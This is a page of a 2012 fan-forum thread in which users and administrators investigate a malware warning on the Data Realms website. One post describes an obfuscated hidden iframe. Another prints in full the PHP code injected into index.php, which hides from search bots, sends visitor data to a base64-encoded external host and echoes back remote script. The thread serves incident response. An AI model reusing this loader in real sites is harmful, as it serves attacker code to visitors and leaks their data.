| Data Realms Fan Forums http://forums.datarealms.com/ |
|
| DataRealms Website Malware Warning http://forums.datarealms.com/viewtopic.php?f=48&t=31195 |
Page 2 of 3 |
| Author: | Dauss [ Mon Jun 11, 2012 4:01 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
Well, this isn't any good is it. |
|
| Author: | TheLastBanana [ Wed Jun 13, 2012 2:28 am ] |
| Post subject: | Re: DataRealms Website Malware Warning |
As you guys can probably imagine, Data is trying to get these problems (as well as some potentially related server issues) dealt with as soon as possible. It's getting a little difficult, though, since he's also trying to work on the next version of CC at the same time. If anybody is willing to give him a hand, or knows anybody who might, send me (or him) a PM. |
|
| Author: | NikolaiLev [ Wed Jun 13, 2012 2:48 am ] |
| Post subject: | Re: DataRealms Website Malware Warning |
Wish I could help, all I can do is point out problems though. The warning is gone right now, that said. |
|
| Author: | NikolaiLev [ Thu Jun 21, 2012 10:37 am ] |
| Post subject: | Re: DataRealms Website Malware Warning |
Uh oh. The warning is back again. |
|
| Author: | findude [ Sun Jun 24, 2012 1:21 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
http://pastebin.com/Y9rTWnzJ Oh hi there. This is the presumably foreign piece of script on the site that I managed to catch. It was in a hidden iframe, with a src of "http://ovalslassostyle.net/111" scriptsrc being "/xSE_dFpCn/xjUVworW?cvgqzt=OL.k_kgz8zX5kO" Funny obfuscation. It creates strings "eval", "substring", "fromCharCode", "indexOf" and "CharAt" with the variables, and calls them as functions. I think the starting ifs break the script after it executes, removing it. http://pastebin.com/QuWRS4Hd Here's my best-guess unobfuscation and cleanup. The script then takes a substring and eval's the decrypted code. http://pastebin.com/MLY8i1kG Ie. exactly what Daman said. |
|
| Author: | NikolaiLev [ Sun Jun 24, 2012 6:01 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
Once again, the warning is gone, for now. Hopefully, for good. |
|
| Author: | scancode [ Sun Jun 24, 2012 8:38 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
If you ever see something like this again, please give me the URL on the datarealms site where the warning appears, and (if possible) the offending code. Site seems clean now. |
|
| Author: | findude [ Sun Jun 24, 2012 8:45 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
As already said, it seems to be happening once per ip or something. The offsite code (called by the obfuscated script) likely hides the script from you once it executes. Or maybe it uses cookies. I caught it with NoScript: it pops a nice big block icon where the invisible iframe resides. Will check the GET console of Firefox the next time it happens, in hopes of getting a look at the offsite code. I doubt that's how it works, but eh. |
|
| Author: | scancode [ Sun Jun 24, 2012 10:11 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
Thanks for the info, findude. Seems we had this stuck in index.php Code: <?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?> So it was getting the evil code from an external site. Time to audit security it seems! |
|
| Author: | Glowsticks [ Sun Jun 24, 2012 11:58 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
So, does this mean DRL users are now part of a botnet, or did I read the last two pages incorrectly? |
|
| Author: | TheLastBanana [ Mon Jun 25, 2012 5:17 am ] |
| Post subject: | Re: DataRealms Website Malware Warning |
I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay. |
|
| Author: | NikolaiLev [ Mon Jun 25, 2012 6:15 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
I always get this warning at the main site http://www.datarealms.com/ and I generally don't proceed after that. But I'll send the PM if it happens again. |
|
| Author: | scancode [ Tue Jun 26, 2012 7:07 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
TheLastBanana wrote: I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay. The last little while being from May 20 onwards. |
|
| Author: | NikolaiLev [ Tue Jun 26, 2012 8:17 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
I ran an avast scan on June 10 and a MWB scan on June 25. The former resulted in some supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, one being Explorer\Advanced|Start_ShowHelp and Explorer\Advanced|Start_ShowSearch. I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site. |
|
| Author: | scancode [ Tue Jun 26, 2012 10:35 pm ] |
| Post subject: | Re: DataRealms Website Malware Warning |
NikolaiLev wrote: I ran an avast scan on June 10 and a MWB scan on June 25. The former resulted in some supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, one being Explorer\Advanced|Start_ShowHelp and Explorer\Advanced|Start_ShowSearch. I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site. PUM = Potentially Unwanted Modifications -- Start_ShowHelp hides Start Menu/Help and Start_ShowSearch hides Start Menu/Search. Pretty simple (and benign) stuff. |
|
| Page 2 of 3 | All times are UTC [ DST ] |
| Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group http://www.phpbb.com/ |
|